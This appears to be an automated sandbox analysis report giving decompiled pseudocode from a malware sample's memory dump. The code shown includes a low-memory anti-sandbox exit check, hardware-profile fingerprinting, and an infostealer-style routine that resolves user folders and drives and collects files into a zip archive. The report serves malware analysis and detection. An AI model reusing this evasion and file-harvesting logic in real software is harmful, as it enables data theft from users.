                                        • String ID: )
                                        • API String ID: 163498487-2427484129
                                        • Opcode ID: 914fac20356287e69cc70d605a75dbfccb9b718f67ae8487c92a1d39cdcf5962
                                        • Instruction ID: 174b8506a009bfe0a1429621e6a178281275a6a32b0810e71503ac1d697b4629
                                        • Opcode Fuzzy Hash: 914fac20356287e69cc70d605a75dbfccb9b718f67ae8487c92a1d39cdcf5962
                                        • Instruction Fuzzy Hash: D641CAB5D00206ABD704CF68C884A9EBBF8FF15360F50422EE95697B82D7319947DBE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D81120 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2133 29d81120-29d8115a call 29db5640 GlobalMemoryStatusEx 2136 29d81179-29d8117b ExitProcess 2133->2136 2137 29d8115c-29d8116d 2133->2137 2138 29d8116f 2137->2138 2139 29d81181-29d8118f call 29dadf46 2137->2139 2138->2136 2140 29d81171-29d81177 2138->2140 2140->2136 2140->2139
                                        C-Code - Quality: 89%
                                        			E29D81120(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
				signed int _v8;
				signed int _v12;
				unsigned int _v68;
				signed int _v72;
				char _v76;
				signed int _t11;
				unsigned int _t16;
				intOrPtr _t17;
				signed int _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;
				signed int _t28;
				unsigned int _t31;

				_t25 = __esi;
				_t24 = __edi;
				_t17 = __ebx;
				_t28 = (_t26 & 0xfffffff8) - 0x48;
				_t11 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t11 ^ _t28;
				_t14 = E29DB5640( &_v76, 0, 0x40);
				_t29 = _t28 + 0xc;
				_v76 = 0x40;
				GlobalMemoryStatusEx(_t28 + 0xc); // executed
				if(_t14 != 1) {
					L4:
					ExitProcess(0);
				}
				_t16 = _v68;
				_t22 = (_t16 << 0x00000020 | _v72) >> 0x14;
				_t14 = _t16 >> 0x14;
				_t31 = _t16 >> 0x14;
				if(_t31 <= 0 && (_t31 < 0 || _t22 < 0x309)) {
					goto L4;
				}
				return E29DADF46(_t14, _t17, _v12 ^ _t29, _t23, _t24, _t25);
			}


















                                        0x29d81120
                                        0x29d81120
                                        0x29d81120
                                        0x29d81126
                                        0x29d81129
                                        0x29d81130
                                        0x29d8113d
                                        0x29d81142
                                        0x29d81149
                                        0x29d81151
                                        0x29d8115a
                                        0x29d81179
                                        0x29d8117b
                                        0x29d8117b
                                        0x29d8115c
                                        0x29d81164
                                        0x29d81168
                                        0x29d8116b
                                        0x29d8116d
                                        0x00000000
                                        0x00000000
                                        0x29d8118f

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitGlobalMemoryProcessStatus_memset
                                        • String ID: @
                                        • API String ID: 2847449748-2766056989
                                        • Opcode ID: b7ba302533443262dbe4448c248c576d70904f240e32d87886a71da8159ba686
                                        • Instruction ID: 043eea5d67e5763fc249b783b77fcb2debb23d6f514d3561da014c4b6cb33c4a
                                        • Opcode Fuzzy Hash: b7ba302533443262dbe4448c248c576d70904f240e32d87886a71da8159ba686
                                        • Instruction Fuzzy Hash: C7F0F6B16183046BD304AB64D956B2EB3E8FB54B10F808A1DFA4AC66C1EB34D506A697
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D895B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 67%
                                        			E29D895B0(intOrPtr* __ecx, void* __edi, signed int _a4, char _a8) {
				signed int _t11;
				signed int _t16;
				signed int _t19;
				intOrPtr _t20;
				void* _t25;
				signed int _t26;
				intOrPtr* _t28;
				void* _t29;

				_t25 = __edi;
				_t21 = __ecx;
				_t19 = _a4;
				_t28 = __ecx;
				if(_t19 > 0xfffffffe) {
					E29DAD440("string too long");
				}
				_t11 =  *(_t28 + 0x14);
				if(_t11 >= _t19) {
					if(_a8 == 0 || _t19 >= 0x10) {
						if(_t19 == 0) {
							 *((intOrPtr*)(_t28 + 0x10)) = _t19;
							if(_t11 >= 0x10) {
								_t28 =  *_t28;
							}
							 *_t28 = 0;
						}
						asm("sbb eax, eax");
						return  ~_t11;
					} else {
						_push(_t25);
						_t26 =  *((intOrPtr*)(_t28 + 0x10));
						if(_t19 < _t26) {
							_t26 = _t19;
						}
						if(_t11 >= 0x10) {
							_t20 =  *_t28;
							if(_t26 != 0) {
								E29DB0010(_t28, _t20, _t26);
								_t29 = _t29 + 0xc;
							}
							_push(_t20);
							_t11 = E29DADF3B();
							_t19 = _a4;
						}
						 *((intOrPtr*)(_t28 + 0x10)) = _t26;
						 *(_t28 + 0x14) = 0xf;
						 *((char*)(_t26 + _t28)) = 0;
						asm("sbb eax, eax");
						return  ~_t11;
					}
				} else {
					_t16 = E29D89750(_t21, _t19,  *((intOrPtr*)(_t28 + 0x10))); // executed
					asm("sbb eax, eax");
					return  ~_t16;
				}
			}











                                        0x29d895b0
                                        0x29d895b0
                                        0x29d895b4
                                        0x29d895b8
                                        0x29d895bd
                                        0x29d895c4
                                        0x29d895c4
                                        0x29d895c9
                                        0x29d895ce
                                        0x29d895ec
                                        0x29d8963e
                                        0x29d89640
                                        0x29d89646
                                        0x29d89648
                                        0x29d89648
                                        0x29d8964a
                                        0x29d8964a
                                        0x29d89651
                                        0x29d89658
                                        0x29d895f3
                                        0x29d895f3
                                        0x29d895f4
                                        0x29d895f9
                                        0x29d895fb
                                        0x29d895fb
                                        0x29d89600
                                        0x29d89602
                                        0x29d89606
                                        0x29d8960b
                                        0x29d89610
                                        0x29d89610
                                        0x29d89613
                                        0x29d89614
                                        0x29d89619
                                        0x29d8961c
                                        0x29d8961f
                                        0x29d89622
                                        0x29d8962b
                                        0x29d89632
                                        0x29d89639
                                        0x29d89639
                                        0x29d895d0
                                        0x29d895d5
                                        0x29d895de
                                        0x29d895e5
                                        0x29d895e5

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D895C4
                                          • Part of subcall function 29DAD440: std::exception::exception.LIBCMT ref: 29DAD455
                                          • Part of subcall function 29DAD440: __CxxThrowException@8.LIBCMT ref: 29DAD46A
                                          • Part of subcall function 29DAD440: std::exception::exception.LIBCMT ref: 29DAD47B
                                        • _memmove.LIBCMT ref: 29D8960B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                        • String ID: string too long
                                        • API String ID: 1785806476-2556327735
                                        • Opcode ID: 7cee484c384a174fb5fbcf1cf629bd6119b019743f8de5c0d1285df5c3e75eb5
                                        • Instruction ID: cdf81f62462f307874ca7cd0fc48bf1b311f6b9ad47fad07f9cca08c4c4f42ff
                                        • Opcode Fuzzy Hash: 7cee484c384a174fb5fbcf1cf629bd6119b019743f8de5c0d1285df5c3e75eb5
                                        • Instruction Fuzzy Hash: 341126B21142106FE7249E78E8C5A1BB798BF21664F104A2FE5C383D83D721E54BA260
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DABEC0 Relevance: 4.5, APIs: 3, Instructions: 48fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29DABEC0(long __edi, void* __esi) {
				void* _t15;
				void* _t17;

				if( *((intOrPtr*)(__esi + 4)) != 0 ||  *(__esi + 0xc) != 0 ||  *(__esi + 0x20) != 0 ||  *((intOrPtr*)(__esi + 0x18)) != 0 ||  *((intOrPtr*)(__esi + 0x14)) != 0 ||  *((char*)(__esi + 0x2c)) != 0) {
					return 0x1000000;
				} else {
					if(__edi != 0) {
						_t15 = CreateFileMappingA(0xffffffff, 0, 4, 0, __edi, 0); // executed
						 *(__esi + 0xc) = _t15;
						if(_t15 == 0) {
							L11:
							return 0x300;
						} else {
							_t17 = MapViewOfFile(_t15, 0xf001f, 0, 0, __edi); // executed
							 *(__esi + 0x20) = _t17;
							if(_t17 != 0) {
								 *((char*)(__esi + 0x1c)) = 1;
								 *(__esi + 0x24) = 0;
								 *((intOrPtr*)(__esi + 0x28)) = __edi;
								return 0;
							} else {
								CloseHandle( *(__esi + 0xc));
								 *(__esi + 0xc) = 0;
								goto L11;
							}
						}
					} else {
						return 0x30000;
					}
				}
			}





                                        0x29dabec4
                                        0x29dabf4f
                                        0x29dabee8
                                        0x29dabeea
                                        0x29dabefd
                                        0x29dabf03
                                        0x29dabf08
                                        0x29dabf33
                                        0x29dabf38
                                        0x29dabf0a
                                        0x29dabf15
                                        0x29dabf1b
                                        0x29dabf20
                                        0x29dabf39
                                        0x29dabf3d
                                        0x29dabf44
                                        0x29dabf49
                                        0x29dabf22
                                        0x29dabf26
                                        0x29dabf2c
                                        0x00000000
                                        0x29dabf2c
                                        0x29dabf20
                                        0x29dabeec
                                        0x29dabef1
                                        0x29dabef1
                                        0x29dabeea

                                        APIs
                                        • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,000F4240,00000000), ref: 29DABEFD
                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,000F4240), ref: 29DABF15
                                        • CloseHandle.KERNEL32(?), ref: 29DABF26
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleMappingView
                                        • String ID:
                                        • API String ID: 1187395538-0
                                        • Opcode ID: 8c415b081b0fe467cfec4fca59e003755aa9e886b63dea651cd04639a80ba032
                                        • Instruction ID: 65da8149ee740e15dcaaa663ec98bbcf400a164ef549dd3a37e6728e250245d0
                                        • Opcode Fuzzy Hash: 8c415b081b0fe467cfec4fca59e003755aa9e886b63dea651cd04639a80ba032
                                        • Instruction Fuzzy Hash: 621152B0940782DFE7358B25C809B0376E4BF44B25F54855EE59685DC1C3BDE186EF14
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA3460 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 43%
                                        			E29DA3460(intOrPtr __ebx, intOrPtr __edi, intOrPtr* __esi) {
				signed int _v8;
				struct tagHW_PROFILE_INFOA _v132;
				char _v136;
				signed int _t10;
				int _t13;
				intOrPtr* _t17;
				intOrPtr _t19;
				intOrPtr _t23;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t27;
				signed int _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t19 = __ebx;
				_t10 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t10 ^ _t28;
				_v136 = 0;
				_t13 = GetCurrentHwProfileA( &_v132); // executed
				 *((intOrPtr*)(__esi + 0x14)) = 0xf;
				 *((intOrPtr*)(__esi + 0x10)) = 0;
				 *((char*)(__esi)) = 0;
				if(_t13 == 0) {
					_push(7);
					_push("Unknown");
				} else {
					_t17 =  &(_v132.szHwProfileGuid);
					_t25 = _t17 + 1;
					do {
						_t23 =  *_t17;
						_t17 = _t17 + 1;
					} while (_t23 != 0);
					_push(_t17 - _t25);
					_push( &(_v132.szHwProfileGuid));
				}
				E29D892C0(_t27);
				return E29DADF46(_t27, _t19, _v8 ^ _t28, _t25, _t26, _t27);
			}















                                        0x29da3460
                                        0x29da3460
                                        0x29da3460
                                        0x29da3469
                                        0x29da3470
                                        0x29da3477
                                        0x29da3481
                                        0x29da3487
                                        0x29da348e
                                        0x29da3495
                                        0x29da349a
                                        0x29da34b2
                                        0x29da34b4
                                        0x29da349c
                                        0x29da349c
                                        0x29da349f
                                        0x29da34a2
                                        0x29da34a2
                                        0x29da34a4
                                        0x29da34a5
                                        0x29da34ab
                                        0x29da34af
                                        0x29da34af
                                        0x29da34bb
                                        0x29da34cf

                                        APIs
                                        • GetCurrentHwProfileA.ADVAPI32(?), ref: 29DA3481
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CurrentProfile
                                        • String ID: Unknown
                                        • API String ID: 2104809126-1654365787
                                        • Opcode ID: 2d65aebc2acf7d45b3d21228034f0cf981f6714e5203ffacb2ebd4ed2e3a519b
                                        • Instruction ID: 14e841e1b552751fe9953b9f854b3b78e3035be0a5fb6ff64e94e5ba781cd66b
                                        • Opcode Fuzzy Hash: 2d65aebc2acf7d45b3d21228034f0cf981f6714e5203ffacb2ebd4ed2e3a519b
                                        • Instruction Fuzzy Hash: 99F02831900209EBDB25CF64D854BAEF7F8AF04700F40855CD4818B640EF78A60EDB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DB56BA Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        C-Code - Quality: 86%
                                        			E29DB56BA(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = RtlAllocateHeap( *0x29dd702c, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0x29dd7694;
					if( *0x29dd7694 == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = E29DB35CE(_t10, _t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E29DB2030(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}










                                        0x29db56bf
                                        0x29db56c4
                                        0x29db56e1
                                        0x29db56e6
                                        0x29db56e8
                                        0x29db56ea
                                        0x29db56ec
                                        0x29db56ec
                                        0x29db56ec
                                        0x00000000
                                        0x29db56f4
                                        0x29db56fd
                                        0x29db5703
                                        0x29db5705
                                        0x00000000
                                        0x00000000
                                        0x29db5739
                                        0x29db573b
                                        0x00000000
                                        0x29db5707
                                        0x29db5707
                                        0x29db570e
                                        0x29db572c
                                        0x29db572f
                                        0x29db5731
                                        0x29db5733
                                        0x29db5733
                                        0x29db5710
                                        0x29db5711
                                        0x29db5717
                                        0x29db5719
                                        0x29db56ed
                                        0x29db56ed
                                        0x29db56ef
                                        0x29db56f2
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29db571b
                                        0x29db571b
                                        0x29db571e
                                        0x29db5720
                                        0x29db5722
                                        0x29db5722
                                        0x29db5728
                                        0x29db5728
                                        0x29db5719
                                        0x00000000
                                        0x29db56c6
                                        0x29db56ca
                                        0x29db56cd
                                        0x29db56d0
                                        0x00000000
                                        0x29db56d2
                                        0x29db56d7
                                        0x29db56e0
                                        0x29db56e0
                                        0x29db56d0
                                        0x00000000

                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,29DB1F6A,?,?,00000000,00000000,00000000,?,29DB51FD,00000001,00000214), ref: 29DB56FD
                                          • Part of subcall function 29DB2030: __getptd_noexit.LIBCMT ref: 29DB2030
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap__getptd_noexit
                                        • String ID:
                                        • API String ID: 328603210-0
                                        • Opcode ID: 3c62aa7c8e1ede5efa4855be6e5084fb96bd85e81f19fbf29dbb02610284283e
                                        • Instruction ID: 4879abdc31982f507481fc13dc8a53d8a6b87f6dea76bd641ab406b1d99fbe99
                                        • Opcode Fuzzy Hash: 3c62aa7c8e1ede5efa4855be6e5084fb96bd85e81f19fbf29dbb02610284283e
                                        • Instruction Fuzzy Hash: C701B536302211DBEB189E25DC74F573799EF416A0F10851EE817CE980DB34D912E650
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 29D90880 Relevance: 135.5, APIs: 59, Strings: 18, Instructions: 706stringCOMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 43%
                                        			E29D90880(intOrPtr __ecx, signed int __edx, CHAR* _a4, intOrPtr _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v1020;
				char _v1124;
				char _v1388;
				char _v2388;
				void* _v3388;
				void* _v4388;
				char _v5388;
				void* _v6388;
				intOrPtr _v6396;
				signed int _v6400;
				char _v6416;
				intOrPtr _v6424;
				intOrPtr _v6428;
				char _v6444;
				intOrPtr _v6452;
				intOrPtr _v6456;
				char _v6472;
				long _v6476;
				char _v6480;
				signed int _v6484;
				signed int* _v6488;
				signed int _v6492;
				char _v6496;
				intOrPtr _v6500;
				signed int _v6504;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t185;
				signed int _t186;
				char* _t213;
				char* _t220;
				intOrPtr* _t224;
				void* _t228;
				intOrPtr* _t230;
				char* _t235;
				char* _t242;
				char* _t248;
				char* _t257;
				char* _t264;
				signed int _t269;
				signed int _t276;
				int _t287;
				char* _t291;
				int _t296;
				CHAR* _t299;
				void* _t304;
				void* _t317;
				void* _t320;
				CHAR* _t321;
				signed int _t325;
				intOrPtr* _t326;
				signed int _t331;
				signed int _t335;
				signed int _t339;
				signed int _t343;
				void* _t346;
				signed int _t347;
				signed int _t349;
				char* _t357;
				intOrPtr _t361;
				char* _t366;
				char* _t372;
				signed int _t376;
				void* _t402;
				void* _t425;
				signed int _t428;
				char* _t429;
				char* _t430;
				char* _t433;
				char* _t434;
				char* _t435;
				signed int _t436;
				char* _t437;
				signed int _t440;
				signed int* _t441;
				void* _t442;
				void* _t447;
				char* _t450;
				signed int _t451;
				signed int _t452;
				void* _t454;
				CHAR* _t455;
				void* _t457;
				CHAR* _t458;
				signed int _t461;
				signed int _t462;
				void* _t463;
				signed int _t464;
				signed int _t465;
				CHAR* _t466;
				CHAR* _t468;
				void* _t470;
				void* _t472;
				CHAR* _t473;
				void* _t475;
				CHAR* _t476;
				void* _t478;
				CHAR* _t479;
				void* _t481;
				CHAR* _t482;
				signed int _t483;
				void* _t484;
				void* _t490;
				void* _t491;
				void* _t493;
				void* _t494;
				void* _t495;
				void* _t496;
				void* _t497;
				void* _t499;

				E29DBCDB0(0x195c);
				_t185 =  *0x29dd5664; // 0xd9555f04
				_t186 = _t185 ^ _t483;
				_v20 = _t186;
				 *[fs:0x0] =  &_v16;
				_v6492 = _a16;
				_v6504 = _a12;
				_v6500 = __ecx;
				_v6484 = __edx;
				E29DB5640( &_v5388, 0, 0x3e8);
				E29DB5640( &_v1020, 0, 0x3e8);
				E29DB5640( &_v2388, 0, 0x3e8);
				lstrcatA( &_v5388, "\\Files\\");
				lstrcatA( &_v5388, _a4);
				lstrcatA( &_v5388, ".zip");
				_v6488 = E29DAD220(0xf4240, _t499);
				_v6480 = 0;
				_v6496 = 0;
				E29DB5640( &_v3388, 0, 0x3e8);
				 *0x29dd85cc( &_v1020, E29DA4650(_a12, "%APPDATA%",  &_v3388 & (0 |  *0x29dd8500(0, 0x1a, 0, 0,  &_v3388, _t186, _t425, _t447, _t317,  *[fs:0x0], E29DC4171, 0xffffffff) < 0x00000000) - 0x00000001));
				E29DB5640( &_v4388, 0, 0x3e8);
				_t490 = _t484 + 0x44;
				_t31 = (0 |  *0x29dd8500(0, 0x1c, 0, 0,  &_v4388) < 0x00000000) - 1; // -1
				_t428 = _t31 &  &_v4388;
				_t450 = StrStrA( &_v1020, "%LOCALAPPDATA%");
				if(_t450 != 0) {
					_t357 =  &_v1020;
					_t320 = _t450 - _t357;
					 *0x29dd8498(0x29dd8830, _t357, _t320);
					_t451 = _t450 + 0xe;
					__eflags = _t451;
					_t34 = _t320 + 0x29dd8830; // 0x0
					_t321 = _t34;
					 *_t321 = 0;
					wsprintfA(_t321, "%s%s", _t428, _t451);
					_t490 = _t490 + 0x10;
					_t213 = 0x29dd8830;
				} else {
					_t213 =  &_v1020;
				}
				 *0x29dd85cc( &_v1020, _t213);
				E29DB5640( &_v3388, 0, 0x3e8);
				_t491 = _t490 + 0xc;
				_t325 = (0 |  *0x29dd8500(0, 0x28, 0, 0,  &_v3388) < 0x00000000) - 0x00000001 &  &_v3388;
				_t429 = StrStrA( &_v1020, "%USERPROFILE%");
				_t452 = 0;
				_t220 =  &_v1020;
				if(_t429 != 0) {
					_t481 = _t429 - _t220;
					 *0x29dd8498(0x29dd8830, _t220, _t481);
					_t43 = _t481 + 0x29dd8830; // 0x0
					_t482 = _t43;
					 *_t482 = 0;
					wsprintfA(_t482, "%s%s", _t325, _t429 + 0xd);
					_t491 = _t491 + 0x10;
					_t220 = 0x29dd8830;
					_t452 = 0;
				}
				 *0x29dd85cc( &_v1020, _t220);
				_v6476 = 0x101;
				GetUserNameA( &_v1388,  &_v6476);
				_t224 =  &_v1388;
				_v6396 = 0xf;
				_v6400 = _t452;
				_v6416 = 0;
				_t402 = _t224 + 1;
				do {
					_t361 =  *_t224;
					_t224 = _t224 + 1;
				} while (_t361 != 0);
				E29D892C0( &_v6416,  &_v1388, _t224 - _t402);
				_v8 = _t452;
				_t228 = E29D89930("C:\\Users\\",  &_v6472,  &_v6416);
				_v8 = 1;
				_t230 = E29D95410("\\Desktop\\",  &_v6444, _t228);
				_t493 = _t491 + 8;
				_v8 = 2;
				if( *((intOrPtr*)(_t230 + 0x14)) < 0x10) {
					_t326 = _t230;
				} else {
					_t326 =  *_t230;
				}
				_t430 = StrStrA( &_v1020, "%DESKTOP%");
				if(_t430 != _t452) {
					_t366 =  &_v1020;
					_t454 = _t430 - _t366;
					 *0x29dd8498(0x29dd8830, _t366, _t454);
					_t65 = _t454 + 0x29dd8830; // 0x0
					_t455 = _t65;
					 *_t455 = 0;
					wsprintfA(_t455, "%s%s", _t326, _t430 + 9);
					_t493 = _t493 + 0x10;
					_t235 = 0x29dd8830;
					_t452 = 0;
					__eflags = 0;
				} else {
					_t235 =  &_v1020;
				}
				 *0x29dd85cc( &_v1020, _t235);
				if(_v6424 >= 0x10) {
					_push(_v6444);
					E29DADF3B();
					_t493 = _t493 + 4;
				}
				_v6424 = 0xf;
				_v6428 = _t452;
				_v6444 = 0;
				if(_v6452 >= 0x10) {
					_push(_v6472);
					E29DADF3B();
					_t493 = _t493 + 4;
				}
				_v8 = 0xffffffff;
				_v6452 = 0xf;
				_v6456 = _t452;
				_v6472 = 0;
				if(_v6396 >= 0x10) {
					_push(_v6416);
					E29DADF3B();
					_t493 = _t493 + 4;
				}
				_v6396 = 0xf;
				_v6400 = _t452;
				_v6416 = 0;
				E29DB5640( &_v4388, _t452, 0x3e8);
				_t494 = _t493 + 0xc;
				_t331 = (0 |  *0x29dd8500(_t452, 5, _t452, _t452,  &_v4388) < 0x00000000) - 0x00000001 &  &_v4388;
				_t433 = StrStrA( &_v1020, "%DOCUMENTS%");
				_t242 =  &_v1020;
				if(_t433 != 0) {
					_t478 = _t433 - _t242;
					 *0x29dd8498(0x29dd8830, _t242, _t478);
					_t90 = _t478 + 0x29dd8830; // 0x0
					_t479 = _t90;
					 *_t479 = 0;
					wsprintfA(_t479, "%s%s", _t331, _t433 + 0xb);
					_t494 = _t494 + 0x10;
					_t242 = 0x29dd8830;
				}
				 *0x29dd85cc( &_v1020, _t242);
				E29DB5640( &_v3388, 0, 0x3e8);
				_t495 = _t494 + 0xc;
				_t335 = (0 |  *0x29dd8500(0, 0x26, 0, 0,  &_v3388) < 0x00000000) - 0x00000001 &  &_v3388;
				_t434 = StrStrA( &_v1020, "%PROGRAMFILES%");
				_t248 =  &_v1020;
				if(_t434 != 0) {
					_t475 = _t434 - _t248;
					 *0x29dd8498(0x29dd8830, _t248, _t475);
					_t99 = _t475 + 0x29dd8830; // 0x0
					_t476 = _t99;
					 *_t476 = 0;
					wsprintfA(_t476, "%s%s", _t335, _t434 + 0xe);
					_t495 = _t495 + 0x10;
					_t248 = 0x29dd8830;
				}
				 *0x29dd85cc( &_v1020, _t248);
				E29DB5640( &_v4388, 0, 0x3e8);
				_t496 = _t495 + 0xc;
				_t339 = (0 |  *0x29dd8500(0, 0x2a, 0, 0,  &_v4388) < 0x00000000) - 0x00000001 &  &_v4388;
				_t435 = StrStrA( &_v1020, "%PROGRAMFILES_86%");
				if(_t435 != 0) {
					_t372 =  &_v1020;
					_t457 = _t435 - _t372;
					 *0x29dd8498(0x29dd8830, _t372, _t457);
					_t436 = _t435 + 0x11;
					__eflags = _t436;
					_t109 = _t457 + 0x29dd8830; // 0x0
					_t458 = _t109;
					 *_t458 = 0;
					wsprintfA(_t458, "%s%s", _t339, _t436);
					_t496 = _t496 + 0x10;
					_t257 = 0x29dd8830;
				} else {
					_t257 =  &_v1020;
				}
				 *0x29dd85cc( &_v1020, _t257);
				E29DB5640( &_v6388, 0, 0x3e8);
				_t497 = _t496 + 0xc;
				_t343 = (0 |  *0x29dd8500(0, 8, 0, 0,  &_v6388) < 0x00000000) - 0x00000001 &  &_v6388;
				_t437 = StrStrA( &_v1020, "%RECENT%");
				_t264 =  &_v1020;
				if(_t437 != 0) {
					_t472 = _t437 - _t264;
					 *0x29dd8498(0x29dd8830, _t264, _t472);
					_t118 = _t472 + 0x29dd8830; // 0x0
					_t473 = _t118;
					 *_t473 = 0;
					wsprintfA(_t473, "%s%s", _t343, _t437 + 8);
					_t497 = _t497 + 0x10;
					_t264 = 0x29dd8830;
				}
				 *0x29dd85cc( &_v1020, _t264);
				_push(0);
				_push("*%DRIVE_FIXED%*");
				_push( &_v1020);
				if( *0x29dd8490() != 0) {
					_v6480 = 1;
				}
				_push(0);
				_push("*%DRIVE_REMOVABLE%*");
				_push( &_v1020);
				if( *0x29dd8490() != 0) {
					_v6480 = 1;
					_v6496 = 1;
				}
				_t376 = _v6504;
				_t269 =  *0x29dd8490(_t376, "*%RECENT%*", 0);
				asm("sbb edi, edi");
				_t440 =  ~( ~_t269);
				if(_v6480 == 0) {
					_t376 = _v6492;
					__eflags = 0;
					E29D90820(0, _t376, _a20, _t440, _a24, 0,  &_v1020, _v6488, _a20, _a8, _v6500);
					_t497 = _t497 + 0x14;
					goto L45;
				} else {
					GetLogicalDriveStringsA(0x64,  &_v1124);
					_t466 =  &_v1124;
					_v6476 = _t466;
					if(_v1124 == 0) {
						L45:
						_t441 = _v6488;
						if(_t441 != 0) {
							__eflags =  *_t441 - 2;
							if( *_t441 == 2) {
								_t461 = _t441[1];
								__eflags =  *((char*)(_t461 + 0x2c));
								if( *((char*)(_t461 + 0x2c)) == 0) {
									E29DAD160(_t461, 0x10000, _t376);
								}
								_t414 =  *(_t461 + 0x20);
								asm("sbb eax, eax");
								_t276 = ( ~( *(_t461 + 0x20)) & 0xfffe0000) + 0x20000;
								__eflags = _t276;
								 *((char*)(_t461 + 0x2c)) = 1;
								_t462 =  *((intOrPtr*)(_t461 + 0x18));
								 *0x29dd8814 = _t276;
							} else {
								_t462 = _v6484;
								_t414 = _v6484;
								 *0x29dd8814 = 0x80000;
							}
						} else {
							_t414 = 0;
							_t462 = 0;
							 *0x29dd8814 = 0x10000;
						}
						_t277 = _v6484;
						if(_t277 != 0) {
							__eflags =  *_t277 - 2;
							if( *_t277 == 2) {
								_t376 =  *(_t277 + 4);
								 *0x29dd8814 = E29DAC840(_t376, _t414,  &_v5388, _t462, 3);
							} else {
								 *0x29dd8814 = 0x80000;
							}
						} else {
							 *0x29dd8814 = 0x10000;
						}
						if(_t441 == 0) {
							 *0x29dd8814 = 0x10000;
						} else {
							_t277 =  *_t441;
							if((_t376 & 0xffffff00 | _t277 == 0x00000001) == 0) {
								__eflags = _t277 - 2;
								if(_t277 == 2) {
									_t464 = _t441[1];
									 *0x29dd8814 = E29DAC130(_t464);
									__eflags = _t464;
									if(_t464 != 0) {
										E29DAD2E0(_t464);
									}
									L68:
									_push(_t441);
									_t277 = E29DADF3B();
									L69:
									 *[fs:0x0] = _v16;
									_pop(_t442);
									_pop(_t463);
									_pop(_t346);
									return E29DADF46(_t277, _t346, _v20 ^ _t483, _t414, _t442, _t463);
								}
